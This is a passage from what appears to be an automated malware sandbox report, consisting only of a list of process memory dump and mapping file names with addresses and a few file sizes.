                                                                                                              • memory/4556-305-0x000001C20A670000-0x000001C20A684000-memory.dmp
                                                                                                                Filesize

                                                                                                                80KB

                                                                                                              • memory/4556-304-0x00000001402CA898-mapping.dmp
                                                                                                              • memory/4584-283-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                Filesize

                                                                                                                3.5MB

                                                                                                              • memory/4584-284-0x00000001401FBC30-mapping.dmp
                                                                                                              • memory/4800-253-0x0000000000000000-mapping.dmp
                                                                                                              • memory/4832-241-0x0000000000000000-mapping.dmp
                                                                                                              • memory/4832-275-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5020-312-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5032-254-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5104-290-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5220-349-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5228-316-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5232-351-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5244-336-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5292-317-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5320-345-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5324-365-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5324-361-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5396-337-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5500-320-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5516-339-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5572-356-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5636-323-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5688-342-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5772-350-0x00000000077D0000-0x00000000077D1000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/5772-348-0x00000000070D0000-0x00000000070D1000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/5772-344-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5784-360-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5788-352-0x0000000000402F68-mapping.dmp
                                                                                                              • memory/5788-357-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5820-359-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5876-358-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5928-330-0x0000000000000000-mapping.dmp
                                                                                                              • memory/5984-364-0x0000000000000000-mapping.dmp
                                                                                                              • memory/6028-353-0x0000000000000000-mapping.dmp
                                                                                                              • memory/6040-333-0x0000000000000000-mapping.dmp
                                                                                                              • memory/6056-367-0x0000000000000000-mapping.dmp
                                                                                                              • memory/6076-366-0x0000000000000000-mapping.dmp
                                                                                                              • memory/6136-335-0x0000000000000000-mapping.dmp